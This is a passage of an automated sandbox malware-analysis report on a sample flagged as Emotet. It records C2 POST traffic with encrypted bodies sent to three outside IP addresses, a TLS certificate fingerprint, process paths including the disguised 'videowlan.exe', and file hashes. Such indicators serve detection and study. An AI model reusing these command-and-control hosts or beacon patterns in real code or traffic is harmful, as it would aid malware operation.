                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                          Mar 31, 2021 18:00:38.265052080 CEST8.8.8.8192.168.2.30x15f5No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                          Mar 31, 2021 18:03:06.005335093 CEST8.8.8.8192.168.2.30x348aNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • 79.172.249.82:443
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          • 178.62.39.238:443

                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          0192.168.2.34971279.172.249.82443C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Mar 31, 2021 17:56:00.265796900 CEST1158OUTPOST / HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: 79.172.249.82:443
                                                                                                                                                                                          Content-Length: 436
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 7b 60 06 d1 44 a5 d6 e2 88 48 bf 43 38 5e e0 29 73 bc 94 ef 47 0e 26 50 73 f5 61 5e 1e fd ab c1 56 bb 26 46 4e bc a8 10 ae 67 12 4d 61 10 96 f7 9c 41 c4 71 4b 45 b0 27 b0 1d c3 d3 30 10 09 05 6c 57 7b c7 15 3e d8 72 b4 68 52 84 30 29 f3 d0 31 24 2f 16 54 8b 91 c3 8b 3b bc 0a 1b 1c ea 1d 69 cc ed 4f dd dd 75 7b 53 72 de 1a fe be 9a 32 49 68 da 46 5d 1b 5d 0b b4 b0 0b ca 0a 2e 91 5e d6 f1 2f f3 9e 5f 4d 3c 1d c2 e8 8f f0 e6 f1 cd c2 38 65 20 25 cc e3 2f 79 9e be 9c 0b b0 5a 77 9f 2d f8 f3 6b 14 41 a1 37 d9 ea 08 fe 01 53 94 98 35 d9 ae aa c9 7f ba 46 11 8d 4d 42 c2 d0 35 31 1d 11 e3 ef c1 e4 b1 2a 5e 52 2e 46 a1 2a 23 84 2c 3e 31 ff eb 6f f0 6c 89 46 28 5a c9 87 0d c7 05 74 29 52 f2 ac 3a 76 ca 32 37 b4 0f ec 2d df 3d bf 54 be 3a 03 fd c8 90 f8 09 15 0d 9f 8f 77 2d 93 58 c1 c8 b4 33 7f cc de 29 37 2f 26 f5 ca 2b d0 5d d8 dc f5 09 73 66 4d 68 0d d6 10 f1 50 56 df 5c 25 29 f2 7b e0 54 04 c9 36 88 07 b8 9d 4c d4 dc 64 c9 be e4 33 40 40 41 7b 0a 62 15 e0 ad 48 a7 85 ee bc 6b 25 93 dd a5 5e 68 d5 ea cb 1f 96 23 96 d1 66 1e af a7 d6 38 35 b5 a2 67 af 72 c4 00 16 5f 75 ad 1a 58 61 49 4b 2d f5 1f 9b 12 b6 14 2b cd 47 01 53 51 a8 18 a2 be 3c f2 b6 cb 11 7d 23 f5 0a b7 59 d2 c8 9f a3 0e 7d bf c0 e4 0f af a2 4d 48 e3 df 84 ce 33 f5 9e 92 eb 7b 30 0e c0 f6 d6 24 27 e1 a5 4f f6 0b 46 7c 59 26 73 68 1f
                                                                                                                                                                                          Data Ascii: {`DHC8^)sG&Psa^V&FNgMaAqKE'0lW{>rhR0)1$/T;iOu{Sr2IhF]].^/_M<8e %/yZw-kA7S5FMB51*^R.F*#,>1olF(Zt)R:v27-=T:w-X3)7/&+]sfMhPV\%){T6Ld3@@A{bHk%^h#f85gr_uXaIK-+GSQ<}#Y}MH3{0$'OF|Y&sh
                                                                                                                                                                                          Mar 31, 2021 17:56:00.320611000 CEST1159INHTTP/1.1 400 Bad Request
                                                                                                                                                                                          Date: Wed, 31 Mar 2021 15:56:00 GMT
                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          1192.168.2.349751167.114.153.15380C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Mar 31, 2021 17:58:58.844094992 CEST7013OUTPOST / HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: 167.114.153.153
                                                                                                                                                                                          Content-Length: 452
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 51 a6 7d 82 5d 0e c0 4e ed 0c 27 aa 8c 7b f7 0e 82 df 35 5e 05 91 ba 3e f3 2f 98 65 aa a6 22 0c bf 53 c7 96 fd 6d fe c4 ea c5 9a b0 0b 17 15 eb e2 d0 4d 9d a3 9c 56 e1 39 12 7d 7a 1e 34 6c 4a 71 46 e5 e2 cd 79 b2 55 89 93 92 1b fd 1b d2 0d 4a 67 08 57 2e 12 90 eb 9c 38 64 10 e1 2d 72 7d 75 3c 65 2a ac 7a 11 96 d0 d7 25 4f 26 3d d3 61 b8 11 e2 c8 2c a4 5d f9 e7 94 f8 fb aa f7 b4 9d 12 6d c0 6f cf 5b 84 da bd 22 88 13 c5 21 16 dc b1 08 ef eb 39 b3 2d 41 42 89 72 6e 43 83 fe 73 95 72 34 4c 3b 1c 02 7e e9 c6 51 49 a7 98 d1 33 c9 c8 d1 f1 15 65 bc 99 13 40 01 27 b0 55 f9 c1 28 6c ab 21 ae e1 3b 57 64 0f 23 9a 9f 0d 48 0d de 7f ac e1 b1 ea 2a fb 6b 08 b2 70 95 e7 43 e8 dc 1d 60 c5 e2 c0 24 ac 78 dd b7 50 f8 3f 7d fc 2d ed 11 1e 8f 5a e1 95 f9 c2 81 b8 ca b5 75 d1 75 28 c7 3b 73 fb 41 44 b9 5e a5 b8 88 24 cd 23 12 bc c5 00 a6 78 f8 0d b3 2f c1 4e 29 b1 65 95 b9 f8 5e a2 e5 83 49 b0 89 c8 81 c5 d9 4f 36 3f b5 c9 86 e9 f6 18 49 d7 3f bb f8 06 ff 12 5e 3b cd 7b 09 93 52 1b 11 bc ff 6a cc 6f af 13 3f 41 74 c2 70 a0 2f b6 93 f6 e4 0c d3 62 ab 2d 69 ab d0 27 b9 da 54 9e 97 ab 66 9a 25 a5 04 14 c9 11 f4 da 9a 6c 78 fd dc 88 0d 98 af ee 07 15 0a 88 13 80 1b 0f fe 88 d5 5f a7 db 58 26 49 50 b3 a3 48 38 57 02 3d 22 3e bc 6f d9 14 7d 3a 8e 97 a3 fc 0a cc f9 c5 9b 97 64 78 7a 9f 99 5d e9 d3 36 12 ce a9 56 31 4f 61 d7 22 47 f3 d3 c0 76 2f 9d 0d 23 d8 2d
                                                                                                                                                                                          Data Ascii: Q}]N'{5^>/e"SmMV9}z4lJqFyUJgW.8d-r}u<e*z%O&=a,]mo["!9-ABrnCsr4L;~QI3e@'U(l!;Wd#H*kpC`$xP?}-Zuu(;sAD^$#x/N)e^IO6?I?^;{Rjo?Atp/b-i'Tf%lx_X&IPH8W=">o}:dxz]6V1Oa"Gv/#-
                                                                                                                                                                                          Mar 31, 2021 17:58:58.984797955 CEST7013INHTTP/1.1 302 Found
                                                                                                                                                                                          X-Powered-By: Express
                                                                                                                                                                                          Vary: Origin, Accept
                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                          Location: https://167.114.153.153/
                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                          Content-Length: 46
                                                                                                                                                                                          Date: Wed, 31 Mar 2021 15:58:58 GMT
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Keep-Alive: timeout=5
                                                                                                                                                                                          Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 31 36 37 2e 31 31 34 2e 31 35 33 2e 31 35 33
                                                                                                                                                                                          Data Ascii: Found. Redirecting to https://167.114.153.153


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          2192.168.2.349766178.62.39.238443C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Mar 31, 2021 18:03:09.805138111 CEST7179OUTPOST / HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: 178.62.39.238:443
                                                                                                                                                                                          Content-Length: 420
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 36 87 63 be ab 4d 11 9a 8d e5 ae 30 8f 03 f4 ed 2f b2 5d 71 22 94 08 55 72 b7 23 60 88 82 58 bc a5 a1 a6 ee 67 d2 b9 c7 a2 75 f2 be 20 ca 5a 1e 72 3c 32 34 49 9d 8d da b0 c4 17 29 6f bc 3b 25 bc f6 35 5b ac b1 1d 6e 5b 72 e1 b7 d0 ff 24 e6 66 d1 eb cc 8c 4c 48 04 bd bb ba c7 c0 50 2a c3 a1 a8 07 ed 2d ee 36 10 7c eb 4f 94 bf 3c f3 2c d7 e8 47 38 6b 1b c7 40 e9 fb 6b d4 06 8f 17 7d 79 88 fa 04 3e 43 80 05 27 64 f8 f2 e9 a3 99 78 20 22 d9 d8 02 c0 c8 8a 3c ec 72 2e 24 da dc cc 73 b9 0e c1 04 e4 2c 14 cd 78 4d 80 15 7d 40 93 36 64 45 bc ca b8 3b 36 30 3c 75 a4 32 e3 13 b0 6d 96 66 c3 6b 3d 83 27 9b ce 35 cc bf 7d 45 c6 68 8b 68 22 af be f7 21 32 3a f1 4d 77 c3 eb 49 51 d4 5d c4 c3 43 3d af 25 8a d2 9e 0b 5e 62 b8 23 96 52 87 ab 9f 99 76 c3 4c ca 04 8e 13 76 97 66 df 65 e3 e3 30 00 26 0d 50 4b 07 9d fe 28 0e d7 90 e4 88 18 54 af c8 99 cc a4 b7 55 2d bf 8f 74 3b cf 2a 29 c2 62 81 51 a3 85 7e 7f 38 9f 93 b1 48 03 7c be ac d5 d3 13 4e a3 2e 84 20 79 8e 43 13 3e 3e 6e 5b d3 eb 66 66 e8 4f 31 60 ae a1 ab 63 a2 0f 95 f1 e9 eb ae 2f 88 89 62 81 e1 a3 1d 7f 68 60 bc c7 90 b7 6a de a4 42 bb 93 e5 18 93 e7 3a 23 ea 68 67 9a 45 03 40 44 d8 65 22 c5 70 3a b0 a9 80 0e f3 ba 6d ec 58 94 57 e6 b3 34 c0 07 4a 52 e6 20 83 d1 99 36 a7 a7 d1 34 31 7d 40 3d d7 36
                                                                                                                                                                                          Data Ascii: 6cM0/]q"Ur#`Xgu Zr<24I)o;%5[n[r$fLHP*-6|O<,G8k@k}y>C'dx "<r.$s,xM}@6dE;60<u2mfk='5}Ehh"!2:MwIQ]C=%^b#RvLvfe0&PK(TU-t;*)bQ~8H|N. yC>>n[ffO1`c/bh`jB:#hgE@De"p:mXW4JR 641}@=6
                                                                                                                                                                                          Mar 31, 2021 18:03:09.856867075 CEST7180INHTTP/1.1 400 Bad Request
                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 31 Mar 2021 16:03:09 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 682
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          3192.168.2.34976879.172.249.82443C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Mar 31, 2021 18:03:40.755369902 CEST7195OUTPOST / HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: 79.172.249.82:443
                                                                                                                                                                                          Content-Length: 420
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 58 bc bb 04 e4 14 85 db 8c 7d 08 8e 27 65 5d 4e ae 1d 58 2d 51 a0 e8 a4 83 99 e8 9c 62 6c 71 ae 52 f9 a7 e8 7f f9 52 42 f9 0b 1e 03 0a 56 0b d2 6c 61 13 e2 2b 87 b8 ea 61 49 e7 e5 44 33 c5 ea 43 e4 55 ce 23 77 f9 5e 6e e1 8d f9 d3 3e 2a 9d 10 59 db 1c 3f f6 8d 2f e6 5e d3 09 3b 57 e1 20 ee b6 a0 61 fe ea cf ce 03 d7 a4 7f f7 45 3f 1c 86 88 e0 d6 22 20 45 81 8b 0e 03 d3 89 c7 2b 44 97 26 68 dd 44 44 73 01 b1 b5 57 b3 54 ad 1a 56 4c 6a f3 86 be c6 9a 3a f5 56 6a 17 7b 5d ac 2a 33 32 75 dd 41 eb ac 2d 0d 23 87 b6 c1 71 4e 0b 80 be c4 92 e6 2b 3c e3 9e ab e4 5b 83 da b6 9e 77 cc 49 48 6a 4b 2c fb d2 da d0 12 89 32 5f 6e 18 c7 e6 3a 3f 37 5c 7b ed 2c 00 c2 30 2c f8 e7 6c 5e 39 de eb 91 13 35 04 f2 80 37 7b f9 7f 96 8d 8c e3 ee 42 97 bb 5f 8c ee 3b 2f 6e 10 a2 6c 66 38 df c4 29 70 ba 0c 7e 25 d6 67 a2 82 4c 90 30 5a 7b 98 cd 64 a3 d3 f7 d3 83 22 cb 4b fe c2 fc 9e 2f a7 6f 38 a4 1d e4 9c 6b 2f 49 d8 15 0e 05 d7 53 a1 fc 04 44 3b 73 19 87 c6 26 0b 95 fb 9a e4 0b 36 06 17 e2 fc f9 0c f8 eb 15 93 3a ea da e8 b3 2e b8 ad 00 c7 13 70 ef 87 26 3a 94 b2 e8 fa 54 95 d7 6a 9e f0 15 2a 51 37 eb e5 06 ad e7 9b 7b 89 1e 60 c4 10 69 e6 90 25 f1 d5 b3 5e 9e a3 ca 70 52 60 32 6c 0c ad b6 a3 a3 83 c6 08 f0 bc 0c 19 53 a7 80 31 ef 10 00 27 e4 33 7e 8a d0 65 f2 f3
                                                                                                                                                                                          Data Ascii: X}'e]NX-QblqRRBVla+aID3CU#w^n>*Y?/^;W aE?" E+D&hDDsWTVLj:Vj{]*32uA-#qN+<[wIHjK,2_n:?7\{,0,l^957{B_;/nlf8)p~%gL0Z{d"K/o8k/ISD;s&6:.p&:Tj*Q7{`i%^pR`2lS1'3~e
                                                                                                                                                                                          Mar 31, 2021 18:03:40.808885098 CEST7195INHTTP/1.1 400 Bad Request
                                                                                                                                                                                          Date: Wed, 31 Mar 2021 16:03:40 GMT
                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                                                                                                                                                          HTTPS Packets

                                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                          Mar 31, 2021 17:58:59.460320950 CEST167.114.153.153443192.168.2.349752CN=uwcodeforce.ca CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 16 21:47:22 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 17 22:47:22 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,051c64c77e60f3980eea90869b68c58a8
                                                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:55:50
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Users\user\Desktop\sample.exe.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:'C:\Users\user\Desktop\sample.exe.exe'
                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                          File size:45568 bytes
                                                                                                                                                                                          MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.197198753.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.195242033.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:55:51
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Users\user\Desktop\sample.exe.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\sample.exe.exe
                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                          File size:45568 bytes
                                                                                                                                                                                          MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.204686591.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.196821065.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:55:51
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                          Imagebase:0x7ff7488e0000
                                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:55:54
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                          File size:45568 bytes
                                                                                                                                                                                          MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.202634160.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.204575479.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:17:55:55
                                                                                                                                                                                          Start date:31/03/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\videowlan.exe
                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                          File size:45568 bytes
                                                                                                                                                                                          MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000000.204137551.0000000000C51000.00000020.00020000.sdmp, Author: Joe Security
